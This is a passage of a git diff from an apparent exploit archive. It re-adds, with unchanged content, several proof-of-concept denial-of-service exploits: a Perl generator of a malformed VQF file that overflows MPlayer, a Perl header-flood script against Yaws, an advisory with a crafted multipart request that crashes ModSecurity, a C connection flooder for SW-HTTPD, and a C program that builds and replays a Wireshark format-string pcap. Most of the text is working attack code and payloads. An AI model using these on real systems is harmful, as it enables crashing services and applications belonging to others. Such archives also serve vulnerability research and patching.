Snoop Security Researching Committee -# www.snoop-security.com -# Originaly this bug discovered by Tobias Klein -# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt -# Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;) -# I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers. -# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members -########################################################################################### -# You Can See Debug dumps here: -# -#(8ec.748): Access violation - code c0000005 (first chance) -#First chance exceptions are reported before any exception handling. -#This exception may be expected and handled. -#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc -#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc -#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216 -#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - -#msvcrt!memcpy+0x33: -#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] -#0:000> g -#(8ec.748): Access violation - code c0000005 (!!! second chance !!!) -#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc -#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc -#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216 -#msvcrt!memcpy+0x33: -#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] -########################################################################################### -my $file="amir.vqf"; -open(my $FILE, ">$file") or die "Cannot open $file: $!"; -$head = "\x00\x01\xD4\xC0"; #SIZE -$head2 = "\x43\x4f\x4d\x4d"; #COMM -$head3 ="\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x2c". - "\x00\x00\x00\x00\x4e\x41\x4d\x45\x00\x00\x00\x0b\x47\x69\x6c\x64". - "\x65\x64\x20\x43\x61\x67\x65\x41\x55\x54\x48\x00\x00\x00\x11\x42". - "\x6c\x61\x63\x6b\x6d\x6f\x72\x65\x91\x73\x20\x4e\x69\x67\x68\x74". - "\x28\x63\x29\x20\x00\x00\x00\x04\x4a\x75\x72\x61\x41\x4c\x42\x4d". - "\x00\x00\x00\x0d\x53\x65\x63\x72\x65\x74\x20\x56\x6f\x79\x61\x67". - "\x65\x54\x52\x43\x4b\x00\x00\x00\x02\x30\x33\x44\x41\x54\x41\x0c"; # other headers. Not in mood to separate every one ;) - -print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p -close($FILE); -print "$file has been created \n"; - -# milw0rm.com [2009-01-16] +#!/usr/bin/perl +# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC +# PoC by Amirreza Aminsalehi "sCORPINo" +# (Proud To be an Abay) +# scorpino x40 gmail x2e com +# Snoop Security Researching Committee +# www.snoop-security.com +# Originaly this bug discovered by Tobias Klein +# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt +# Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;) +# I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers. +# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members +########################################################################################### +# You Can See Debug dumps here: +# +#(8ec.748): Access violation - code c0000005 (first chance) +#First chance exceptions are reported before any exception handling. +#This exception may be expected and handled. +#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc +#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc +#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216 +#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - +#msvcrt!memcpy+0x33: +#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] +#0:000> g +#(8ec.748): Access violation - code c0000005 (!!! second chance !!!) +#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc +#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc +#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216 +#msvcrt!memcpy+0x33: +#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] +########################################################################################### +my $file="amir.vqf"; +open(my $FILE, ">$file") or die "Cannot open $file: $!"; +$head = "\x00\x01\xD4\xC0"; #SIZE +$head2 = "\x43\x4f\x4d\x4d"; #COMM +$head3 ="\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x2c". + "\x00\x00\x00\x00\x4e\x41\x4d\x45\x00\x00\x00\x0b\x47\x69\x6c\x64". + "\x65\x64\x20\x43\x61\x67\x65\x41\x55\x54\x48\x00\x00\x00\x11\x42". + "\x6c\x61\x63\x6b\x6d\x6f\x72\x65\x91\x73\x20\x4e\x69\x67\x68\x74". + "\x28\x63\x29\x20\x00\x00\x00\x04\x4a\x75\x72\x61\x41\x4c\x42\x4d". + "\x00\x00\x00\x0d\x53\x65\x63\x72\x65\x74\x20\x56\x6f\x79\x61\x67". + "\x65\x54\x52\x43\x4b\x00\x00\x00\x02\x30\x33\x44\x41\x54\x41\x0c"; # other headers. Not in mood to separate every one ;) + +print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p +close($FILE); +print "$file has been created \n"; + +# milw0rm.com [2009-01-16] diff --git a/platforms/multiple/dos/8091.html b/platforms/multiple/dos/8091.html index 0b661ab0d..7a0a1cf61 100755 --- a/platforms/multiple/dos/8091.html +++ b/platforms/multiple/dos/8091.html @@ -1,7 +1,7 @@ - - -# milw0rm.com [2009-02-23] + + +# milw0rm.com [2009-02-23] diff --git a/platforms/multiple/dos/8148.pl b/platforms/multiple/dos/8148.pl index 3a9a70072..56475aa77 100755 --- a/platforms/multiple/dos/8148.pl +++ b/platforms/multiple/dos/8148.pl @@ -1,66 +1,66 @@ -#!usr/bin/perl -w - -####################################################################################### -# Yaws before 1.80 allows remote attackers to cause a denial of service (memory -# consumption and crash) via a request with a large number of headers. -# Refer: -# http://yaws.hyber.org/ -# http://www.securityfocus.com/bid/33834/discuss -# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751 -# -#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$ -#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$ -# -# Author: Praveen Dar$hanam -# Email: praveen[underscore]recker[at]sify.com -# Blog: http://www.darshanams.blogspot.com/ -# Date: 03rd March, 2009 -# Site: http://www.evilfingers.com/ -# -###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks### -######################################################################################## - -use IO::Socket; - -print("\nEnter IP Address of Yaws Server(not domain): \n"); -$vuln_host_ip = ; -chomp($vuln_host_ip); -$port = 80; - -$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip, - PeerPort => $port, - Proto => 'tcp') || "Unable to create HTTP Socket"; - - -$headers="Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n". -"Accept-Ranges: bytes\r\n". -"Content-Language: en\r\n". -"Content-Type: text/html; charset=utf-8\r\n". -"Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n". -"Cache-Control: no-cache\r\n". -"Content-Encoding: gzip\r\n". -"Retry-After: 100\r\n"; -print "\nHeaders are:\n$headers"; - -$i=0; -while($i<=13) #this is just a PoC -{ -$headers=$headers.$headers; -$i++; -} -print "\nHeaders are:\n$headers"; -$yaws_attack = "GET / HTTP/1.1\r\n". -"Host: $vuln_host_ip:$port\r\n". -"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". -$headers. -"Keep-Alive: 300\r\n". -"Connection: keep-alive\r\n". -"\r\n"; -sleep(3); -print $sock_http $yaws_attack; -sleep(2); -print"\nRequest with large number of Headers sent...\n"; - -close($sock_http); - -# milw0rm.com [2009-03-03] +#!usr/bin/perl -w + +####################################################################################### +# Yaws before 1.80 allows remote attackers to cause a denial of service (memory +# consumption and crash) via a request with a large number of headers. +# Refer: +# http://yaws.hyber.org/ +# http://www.securityfocus.com/bid/33834/discuss +# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751 +# +#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$ +#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$ +# +# Author: Praveen Dar$hanam +# Email: praveen[underscore]recker[at]sify.com +# Blog: http://www.darshanams.blogspot.com/ +# Date: 03rd March, 2009 +# Site: http://www.evilfingers.com/ +# +###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks### +######################################################################################## + +use IO::Socket; + +print("\nEnter IP Address of Yaws Server(not domain): \n"); +$vuln_host_ip = ; +chomp($vuln_host_ip); +$port = 80; + +$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip, + PeerPort => $port, + Proto => 'tcp') || "Unable to create HTTP Socket"; + + +$headers="Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n". +"Accept-Ranges: bytes\r\n". +"Content-Language: en\r\n". +"Content-Type: text/html; charset=utf-8\r\n". +"Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n". +"Cache-Control: no-cache\r\n". +"Content-Encoding: gzip\r\n". +"Retry-After: 100\r\n"; +print "\nHeaders are:\n$headers"; + +$i=0; +while($i<=13) #this is just a PoC +{ +$headers=$headers.$headers; +$i++; +} +print "\nHeaders are:\n$headers"; +$yaws_attack = "GET / HTTP/1.1\r\n". +"Host: $vuln_host_ip:$port\r\n". +"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". +$headers. +"Keep-Alive: 300\r\n". +"Connection: keep-alive\r\n". +"\r\n"; +sleep(3); +print $sock_http $yaws_attack; +sleep(2); +print"\nRequest with large number of Headers sent...\n"; + +close($sock_http); + +# milw0rm.com [2009-03-03] diff --git a/platforms/multiple/dos/8219.html b/platforms/multiple/dos/8219.html index d955f4966..e99532326 100755 --- a/platforms/multiple/dos/8219.html +++ b/platforms/multiple/dos/8219.html @@ -1,10 +1,10 @@ - - -# milw0rm.com [2009-03-16] + + +# milw0rm.com [2009-03-16] diff --git a/platforms/multiple/dos/8241.txt b/platforms/multiple/dos/8241.txt index ce042b6ea..f7fc289ce 100755 --- a/platforms/multiple/dos/8241.txt +++ b/platforms/multiple/dos/8241.txt @@ -1,127 +1,127 @@ -============================================= -INTERNET SECURITY AUDITORS ALERT 2009-001 -- Original release date: February 25th, 2009 -- Last revised: March 19th, 2009 -- Discovered by: Juan Galiana Lara -- Severity: 7.8/10 (CVSS Base Scored) -============================================= - -I. VULNERABILITY -------------------------- -ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) - -II. BACKGROUND -------------------------- -ModSecurity is the most widely-deployed web application firewall in -the world, with more than 15,000 users. It runs as a Apache web server -module and is developed by Breach Security [ http://www.breach.com ], -it's avaliable with GNU GPL and many other comercial licenses. - -III. DESCRIPTION -------------------------- -The multipart processor of modsecurity does not sanitize the user -supplied input sufficiently. Therefore, an attacker can send a crafted -post request of type multipart/form-data which will lead in a remote -denial of service. - -The snippet of vulnerable code: - -in file msc_multipart.c - -1256 int multipart_get_arguments(modsec_rec *msr, char *origin, -apr_table_t *arguments) { -1257 multipart_part **parts; -1258 int i; -1259 -1260 parts = (multipart_part **)msr->mpd->parts->elts; -1261 for(i = 0; i < msr->mpd->parts->nelts; i++) { -1262 if (parts[i]->type == MULTIPART_FORMDATA) { -1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, -sizeof(msc_arg)); -1264 if (arg == NULL) return -1; -1265 -1266 arg->name = parts[i]->name; -1267 arg->name_len = strlen(parts[i]->name); - -On line 1267, due to the pointer parts[i]->name is not properly -sanitized the parameter of strlen function takes the value NULL, -getting a segmentation fault and resulting in a crash of the apache -process that handle the request. - -IV. PROOF OF CONCEPT -------------------------- -The process could be crashed remotely by sending: - -POST / HTTP/1.0 -Content-Type: multipart/form-data; -boundary=---------------------------xxxxxxxxxxxxxx -Content-Length: 91 - ------------------------------xxxxxxxxxxxxxx -: ------------------------------xxxxxxxxxxxxxx-- - -In order to send a correct HTTP/1.1 request you must add a valid Host -header. - -With the configuration directives: - - SecAuditEngine On - SecDebugLogLevel 9 - -After the attack, the last line of the debug logfile is: - -[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] -Multipart: Added part abe458 to the list: name "(null)" (offset 0, -length 0) - -V. BUSINESS IMPACT -------------------------- -An attacker could cause a remote denial of service to an Apache -installation with modsecurity 2 module. - -VI. SYSTEMS AFFECTED -------------------------- -ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may -be affected. - -Tested with Apache httpd 2.2.11. - -VII. SOLUTION -------------------------- -Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from -http://modsecurity.org/download/ - -VIII. REFERENCES -------------------------- -http://www.modsecurity.org -http://www.isecauditors.com - -IX. CREDITS -------------------------- -This vulnerability has been discovered -by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). -Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com). - -X. REVISION HISTORY -------------------------- -February 25, 2009: Initial release -March 19, 2009: Revision. - -XI. DISCLOSURE TIMELINE -------------------------- -Febraury 25, 2009: Vulnerability acquired by - Internet Security Auditors (www.isecauditors.com) -March 02, 2009: ModSecurity contacted. -March 02, 2009: Response about remediation plan. -March 11, 2009: Path released -March 19, 2009: Published. - -XII. LEGAL NOTICES -------------------------- -The information contained within this advisory is supplied "as-is" -with no warranties or guarantees of fitness of use or otherwise. -Internet Security Auditors, S.L. accepts no responsibility for any -damage caused by the use or misuse of this information. - -# milw0rm.com [2009-03-19] +============================================= +INTERNET SECURITY AUDITORS ALERT 2009-001 +- Original release date: February 25th, 2009 +- Last revised: March 19th, 2009 +- Discovered by: Juan Galiana Lara +- Severity: 7.8/10 (CVSS Base Scored) +============================================= + +I. VULNERABILITY +------------------------- +ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) + +II. BACKGROUND +------------------------- +ModSecurity is the most widely-deployed web application firewall in +the world, with more than 15,000 users. It runs as a Apache web server +module and is developed by Breach Security [ http://www.breach.com ], +it's avaliable with GNU GPL and many other comercial licenses. + +III. DESCRIPTION +------------------------- +The multipart processor of modsecurity does not sanitize the user +supplied input sufficiently. Therefore, an attacker can send a crafted +post request of type multipart/form-data which will lead in a remote +denial of service. + +The snippet of vulnerable code: + +in file msc_multipart.c + +1256 int multipart_get_arguments(modsec_rec *msr, char *origin, +apr_table_t *arguments) { +1257 multipart_part **parts; +1258 int i; +1259 +1260 parts = (multipart_part **)msr->mpd->parts->elts; +1261 for(i = 0; i < msr->mpd->parts->nelts; i++) { +1262 if (parts[i]->type == MULTIPART_FORMDATA) { +1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, +sizeof(msc_arg)); +1264 if (arg == NULL) return -1; +1265 +1266 arg->name = parts[i]->name; +1267 arg->name_len = strlen(parts[i]->name); + +On line 1267, due to the pointer parts[i]->name is not properly +sanitized the parameter of strlen function takes the value NULL, +getting a segmentation fault and resulting in a crash of the apache +process that handle the request. + +IV. PROOF OF CONCEPT +------------------------- +The process could be crashed remotely by sending: + +POST / HTTP/1.0 +Content-Type: multipart/form-data; +boundary=---------------------------xxxxxxxxxxxxxx +Content-Length: 91 + +-----------------------------xxxxxxxxxxxxxx +: +-----------------------------xxxxxxxxxxxxxx-- + +In order to send a correct HTTP/1.1 request you must add a valid Host +header. + +With the configuration directives: + + SecAuditEngine On + SecDebugLogLevel 9 + +After the attack, the last line of the debug logfile is: + +[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] +Multipart: Added part abe458 to the list: name "(null)" (offset 0, +length 0) + +V. BUSINESS IMPACT +------------------------- +An attacker could cause a remote denial of service to an Apache +installation with modsecurity 2 module. + +VI. SYSTEMS AFFECTED +------------------------- +ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may +be affected. + +Tested with Apache httpd 2.2.11. + +VII. SOLUTION +------------------------- +Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from +http://modsecurity.org/download/ + +VIII. REFERENCES +------------------------- +http://www.modsecurity.org +http://www.isecauditors.com + +IX. CREDITS +------------------------- +This vulnerability has been discovered +by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). +Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com). + +X. REVISION HISTORY +------------------------- +February 25, 2009: Initial release +March 19, 2009: Revision. + +XI. DISCLOSURE TIMELINE +------------------------- +Febraury 25, 2009: Vulnerability acquired by + Internet Security Auditors (www.isecauditors.com) +March 02, 2009: ModSecurity contacted. +March 02, 2009: Response about remediation plan. +March 11, 2009: Path released +March 19, 2009: Published. + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" +with no warranties or guarantees of fitness of use or otherwise. +Internet Security Auditors, S.L. accepts no responsibility for any +damage caused by the use or misuse of this information. + +# milw0rm.com [2009-03-19] diff --git a/platforms/multiple/dos/8245.c b/platforms/multiple/dos/8245.c index 081c7766d..b156dddb6 100755 --- a/platforms/multiple/dos/8245.c +++ b/platforms/multiple/dos/8245.c @@ -1,91 +1,91 @@ -/* -SW-HTTPD Server v0.x Denial of Service (PoC) - -Multiple Connections with GET /A[100] HTTP/1.1 -After server not found all pages. - -Author: Jonathan Salwan -Mail : submit [AT] shell-storm.org -Web : http://www.shell-storm.org -*/ - -#include "stdio.h" -#include "unistd.h" -#include "stdlib.h" -#include "sys/types.h" -#include "sys/socket.h" -#include "netinet/in.h" - -int syntax(char *file) - { - fprintf(stderr,"SW-HTTPD Server Denial of Service (PoC)\n"); - fprintf(stderr,"=>Syntax : <%s> \n\n",file); - exit(0); - } - -int main(int argc, char **argv) -{ - if (argc < 2) - syntax(argv[0]); - - int port = atoi(argv[2]); - - int mysocket; - int mysocket2; - int srv_connect; - int sockaddr_long; - - - char hexa[100] = "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"; - - struct sockaddr_in sockaddr_mysocket; - sockaddr_long = sizeof(sockaddr_mysocket); - sockaddr_mysocket.sin_family = AF_INET; - sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]); - sockaddr_mysocket.sin_port = htons(port); - - int i=0; - char request[118]; - - fprintf(stdout,"[+]SW-HTTPD Server %s\n",argv[1]); - -for(i=0;i<100000;i++){ - - mysocket2 = socket(AF_INET, SOCK_STREAM, 0); - if(mysocket2 == -1){ - fprintf(stdout,"[+]Done!\n"); - return 1;} - - srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long); - - if (srv_connect != -1) - { - sprintf(request, "GET /%s HTTP/1.1\r\n", hexa); - - if (send(mysocket2,request,sizeof(request),0) == -1){ - fprintf(stderr,"[-]Send Request\t\t[FAILED]\n"); - shutdown(mysocket2,1); - fprintf(stdout,"[+]Done!\n"); - return 1;} - } - else{ - fprintf(stderr,"[-]Connect\t\t[FAILED]\n"); - fprintf(stdout,"[+]Done!\n"); - shutdown(mysocket2,1); - return 1;} - - shutdown(mysocket2,1); -} -return 0; -} - -// milw0rm.com [2009-03-19] +/* +SW-HTTPD Server v0.x Denial of Service (PoC) + +Multiple Connections with GET /A[100] HTTP/1.1 +After server not found all pages. + +Author: Jonathan Salwan +Mail : submit [AT] shell-storm.org +Web : http://www.shell-storm.org +*/ + +#include "stdio.h" +#include "unistd.h" +#include "stdlib.h" +#include "sys/types.h" +#include "sys/socket.h" +#include "netinet/in.h" + +int syntax(char *file) + { + fprintf(stderr,"SW-HTTPD Server Denial of Service (PoC)\n"); + fprintf(stderr,"=>Syntax : <%s> \n\n",file); + exit(0); + } + +int main(int argc, char **argv) +{ + if (argc < 2) + syntax(argv[0]); + + int port = atoi(argv[2]); + + int mysocket; + int mysocket2; + int srv_connect; + int sockaddr_long; + + + char hexa[100] = "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"; + + struct sockaddr_in sockaddr_mysocket; + sockaddr_long = sizeof(sockaddr_mysocket); + sockaddr_mysocket.sin_family = AF_INET; + sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]); + sockaddr_mysocket.sin_port = htons(port); + + int i=0; + char request[118]; + + fprintf(stdout,"[+]SW-HTTPD Server %s\n",argv[1]); + +for(i=0;i<100000;i++){ + + mysocket2 = socket(AF_INET, SOCK_STREAM, 0); + if(mysocket2 == -1){ + fprintf(stdout,"[+]Done!\n"); + return 1;} + + srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long); + + if (srv_connect != -1) + { + sprintf(request, "GET /%s HTTP/1.1\r\n", hexa); + + if (send(mysocket2,request,sizeof(request),0) == -1){ + fprintf(stderr,"[-]Send Request\t\t[FAILED]\n"); + shutdown(mysocket2,1); + fprintf(stdout,"[+]Done!\n"); + return 1;} + } + else{ + fprintf(stderr,"[-]Connect\t\t[FAILED]\n"); + fprintf(stdout,"[+]Done!\n"); + shutdown(mysocket2,1); + return 1;} + + shutdown(mysocket2,1); +} +return 0; +} + +// milw0rm.com [2009-03-19] diff --git a/platforms/multiple/dos/8308.c b/platforms/multiple/dos/8308.c index 9583353cb..a26b69d03 100755 --- a/platforms/multiple/dos/8308.c +++ b/platforms/multiple/dos/8308.c @@ -1,44 +1,44 @@ -/* -################## THCX ####################################### -# Wireshark <= 1.0.6 PN-DCP format string bug POC -############################################################### -# [!] autore: THCX Labs -# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC -# [!] local open of pcapfile also working -############################################################### -*/ -#include -#include -#include -char sploit[]= -"\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00" -"\x96\x2c\x8f\x47\x97\xaa\x0d\x00\x22\x00\x00\x00\x22\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80" -"\xc8\x38\xa4\x8b\x81\x00\x00\x00\x88\x92\xfe\xfe\x05\x00\x01\x00\x00\x01\x00\x01\x00\x04\xff\xff" -"\x00\x00\x96\x2c\x8f\x47\x96\xae\x0d\x00\xd6\x00\x00\x00\xd6\x00\x00\x00\x00\x80\xc8\x38\xa4\x8b" -"\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xff\x05\x01\x01\x00\x00\x01\x00\x00\x00\xb8" -"\x02\x05\x00\x10\x00\x00\x02\x01\x02\x02\x02\x03\x02\x04\x02\x05\x01\x01\x01\x02\x02\x01\x00\x0a" -"\x00\x00\x53\x37\x2d\x33\x30\x30\x45\x43\x02\x02\x00\x6e\x00\x00\x25\x6e\x25\x6e\x25\x6e\x20\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x02\x03\x00\x06\x00\x00\x00\x2a\x01\x01\x02\x04\x00\x04\x00\x00\x02\x00\x01\x02" -"\x00\x0e\x00\x01\xc0\xa8\x00\x0b\xff\xff\xff\x00\xc0\xa8\x00\x0b\x97\x2c\x8f\x47\xf2\xd0\x0e\x00" -"\x32\x00\x00\x00\x32\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80\xc8\x38\xa4\x8b\x81\x00\x00\x00" -"\x88\x92\xfe\xfd\x04\x00\x01\x00\x00\x01\x00\x00\x00\x14\x02\x02\x00\x09\x00\x01\x25\x6e\x25\x6e" -"\x25\x6e\x20\x00\x05\x02\x00\x02\x00\x00\x97\x2c\x8f\x47\x82\xd2\x0e\x00\x40\x00\x00\x00\x40\x00" -"\x00\x00\x00\x80\xc8\x38\xa4\x8b\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xfd\x04\x01" -"\x01\x00\x00\x01\x00\x00\x00\x10\x05\x04\x00\x03\x02\x02\x00\x00\x05\x04\x00\x03\x05\x02\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; -int main(){ -FILE *fh; -int r; -fh=fopen("formatstringbug.pcap","wb"); -if(!fh){perror("no open");exit(1);} -fwrite(sploit,sizeof sploit,1,fh); -fclose(fh); -r=system("tcpreplay -i eth0 formatstringbug.pcap"); -return 0; -} - -// milw0rm.com [2009-03-30] +/* +################## THCX ####################################### +# Wireshark <= 1.0.6 PN-DCP format string bug POC +############################################################### +# [!] autore: THCX Labs +# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC +# [!] local open of pcapfile also working +############################################################### +*/ +#include +#include +#include +char sploit[]= +"\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00" +"\x96\x2c\x8f\x47\x97\xaa\x0d\x00\x22\x00\x00\x00\x22\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80" +"\xc8\x38\xa4\x8b\x81\x00\x00\x00\x88\x92\xfe\xfe\x05\x00\x01\x00\x00\x01\x00\x01\x00\x04\xff\xff" +"\x00\x00\x96\x2c\x8f\x47\x96\xae\x0d\x00\xd6\x00\x00\x00\xd6\x00\x00\x00\x00\x80\xc8\x38\xa4\x8b" +"\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xff\x05\x01\x01\x00\x00\x01\x00\x00\x00\xb8" +"\x02\x05\x00\x10\x00\x00\x02\x01\x02\x02\x02\x03\x02\x04\x02\x05\x01\x01\x01\x02\x02\x01\x00\x0a" +"\x00\x00\x53\x37\x2d\x33\x30\x30\x45\x43\x02\x02\x00\x6e\x00\x00\x25\x6e\x25\x6e\x25\x6e\x20\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x02\x03\x00\x06\x00\x00\x00\x2a\x01\x01\x02\x04\x00\x04\x00\x00\x02\x00\x01\x02" +"\x00\x0e\x00\x01\xc0\xa8\x00\x0b\xff\xff\xff\x00\xc0\xa8\x00\x0b\x97\x2c\x8f\x47\xf2\xd0\x0e\x00" +"\x32\x00\x00\x00\x32\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80\xc8\x38\xa4\x8b\x81\x00\x00\x00" +"\x88\x92\xfe\xfd\x04\x00\x01\x00\x00\x01\x00\x00\x00\x14\x02\x02\x00\x09\x00\x01\x25\x6e\x25\x6e" +"\x25\x6e\x20\x00\x05\x02\x00\x02\x00\x00\x97\x2c\x8f\x47\x82\xd2\x0e\x00\x40\x00\x00\x00\x40\x00" +"\x00\x00\x00\x80\xc8\x38\xa4\x8b\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xfd\x04\x01" +"\x01\x00\x00\x01\x00\x00\x00\x10\x05\x04\x00\x03\x02\x02\x00\x00\x05\x04\x00\x03\x05\x02\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; +int main(){ +FILE *fh; +int r; +fh=fopen("formatstringbug.pcap","wb"); +if(!fh){perror("no open");exit(1);} +fwrite(sploit,sizeof sploit,1,fh); +fclose(fh); +r=system("tcpreplay -i eth0 formatstringbug.pcap"); +return 0; +} + +// 